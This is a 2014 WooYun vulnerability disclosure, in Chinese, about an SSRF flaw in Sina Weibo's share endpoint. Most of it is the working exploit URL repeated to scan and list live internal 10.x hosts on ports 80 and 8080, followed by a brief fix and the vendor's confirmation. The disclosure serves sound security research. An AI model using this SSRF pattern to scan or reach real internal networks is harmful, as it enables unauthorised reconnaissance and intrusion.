[公开漏洞]内网编织者新浪内网急速编织!(内网系统遍历)

来源:WooYun 浏览:738次 时间:2014-07-05
做网站找雨过天晴工作室
内网编织者新浪内网急速编织!(内网系统遍历) 相关厂商: 新浪 漏洞作者:路人甲 提交时间:2014-05-21 14:11 公开时间:2014-07-05 14:11 漏洞类型:设计缺陷/逻辑错误 危害等级:高 自评Rank:12 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 设计缺陷/边界绕过 设计不当 SSRF 内网编织 漏洞详情 披露状态:

2014-05-21:细节已通知厂商并且等待厂商处理中
2014-05-21:厂商已经确认,细节仅向厂商公开
2014-05-31:细节向核心白帽子及相关领域专家公开
2014-06-10:细节向普通白帽子公开
2014-06-20:细节向实习白帽子公开
2014-07-05:细节向公众公开

简要描述:

RT!

详细说明:

参照之前小技巧:



WooYun: 内网编织者中国搜索引擎内网快速编织





结合小细节把握,一个SSRF漏洞就能很快编织出大型公司内网的结构(如果是一般的小应用它算不上漏洞,但对于有大型网络结构的应用就不一样了,这是个标志性的漏洞,因为能直接撕开网络边界,看似很小,但效果很好。危害不仅限于http协议(也不仅限于这类场景功能的实现缺陷,其他漏洞也可以去构造SSRF),可能会引领以后的web漏洞新潮流).











这里是分享功能实现缺陷,允许访问当前应用所在的内网.





快速验证漏洞,访问当前服务器:





http://service.weibo.com/share/share.php?url=http://127.0.0.1:80





1.1.png











漏洞证明:

结合小细节化的工具就能批量了(随便找了几个存活的网段,扫描80,8080端口的应用):



0.png









10.67.15.*



80:



find: http://service.weibo.com/share/share.php?url=http://10.67.15.10:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.11:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.12:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.13:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.18:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.19:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.22:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.23:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.24:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.25:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.26:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.27:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.28:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.29:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.31:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.32:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.33:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.35:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.37:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.38:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.39:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.42:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.43:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.47:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.65:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.66:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.67:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.68:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.69:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.88:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.89:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.90:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.96:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.98:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.105:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.110:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.117:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.136:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.138:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.139:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.140:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.141:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.142:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.145:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.154:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.155:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.156:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.171:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.172:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.177:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.180:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.187:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.189:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.195:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.196:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.198:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.199:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.204:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.214:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.216:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.217:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.222:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.227:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.244:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.245:80

find: http://service.weibo.com/share/share.php?url=http://10.67.15.254:80





8080:



find: http://service.weibo.com/share/share.php?url=http://10.67.15.10:8080

find: http://service.weibo.com/share/share.php?url=http://10.67.15.11:8080

find: http://service.weibo.com/share/share.php?url=http://10.67.15.12:8080

find: http://service.weibo.com/share/share.php?url=http://10.67.15.13:8080

find: http://service.weibo.com/share/share.php?url=http://10.67.15.63:8080

find: http://service.weibo.com/share/share.php?url=http://10.67.15.64:8080

find: http://service.weibo.com/share/share.php?url=http://10.67.15.195:8080

find: http://service.weibo.com/share/share.php?url=http://10.67.15.214:8080















10.29.10.*



80:



find: http://service.weibo.com/share/share.php?url=http://10.29.10.11:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.33:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.35:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.37:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.38:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.41:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.42:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.43:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.44:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.45:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.47:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.49:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.51:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.72:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.76:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.78:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.86:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.100:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.101:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.115:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.121:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.122:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.123:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.124:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.125:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.131:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.133:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.137:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.145:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.154:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.156:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.157:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.171:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.179:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.183:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.184:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.189:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.190:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.193:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.196:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.200:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.201:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.206:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.208:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.209:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.210:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.211:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.212:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.215:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.216:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.217:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.218:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.219:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.221:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.222:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.223:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.224:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.234:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.251:80

find: http://service.weibo.com/share/share.php?url=http://10.29.10.252:80





8080:



find: http://service.weibo.com/share/share.php?url=http://10.29.10.40:8080

find: http://service.weibo.com/share/share.php?url=http://10.29.10.204:8080



10.55.22.*





80:





find: http://service.weibo.com/share/share.php?url=http://10.55.22.36:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.37:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.38:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.43:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.44:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.45:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.61:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.68:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.76:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.91:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.92:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.102:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.104:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.106:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.109:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.114:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.116:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.117:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.124:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.126:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.130:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.131:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.144:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.145:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.146:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.147:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.155:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.159:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.162:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.163:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.173:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.176:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.177:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.180:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.182:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.185:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.186:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.187:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.188:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.191:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.192:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.203:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.205:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.208:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.215:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.221:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.224:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.225:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.241:80

find: http://service.weibo.com/share/share.php?url=http://10.55.22.250:80









8080:





find: http://service.weibo.com/share/share.php?url=http://10.55.22.108:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.135:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.138:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.141:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.175:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.181:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.190:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.204:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.206:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.246:8080

find: http://service.weibo.com/share/share.php?url=http://10.55.22.249:8080













10.210.208.*





80:





find: http://service.weibo.com/share/share.php?url=http://10.210.208.5:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.34:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.42:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.43:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.45:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.47:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.48:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.49:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.52:80

find: http://service.weibo.com/share/share.php?url=http://10.210.208.54:80







8080:







find: http://service.weibo.com/share/share.php?url=http://10.210.208.36:8080

find: http://service.weibo.com/share/share.php?url=http://10.210.208.47:8080

find: http://service.weibo.com/share/share.php?url=http://10.210.208.49:8080











10.67.24.*





80:





find: http://service.weibo.com/share/share.php?url=http://10.67.24.30:80







内网结构,一目了然!





1.png









2.png









3.png











4.png







5.png







6.png





修复方案:

限制内网请求!

版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-21 16:57

厂商回复:

感谢关注新浪安全,麻烦通知相应的工作人员 进行处理

最新状态:

暂无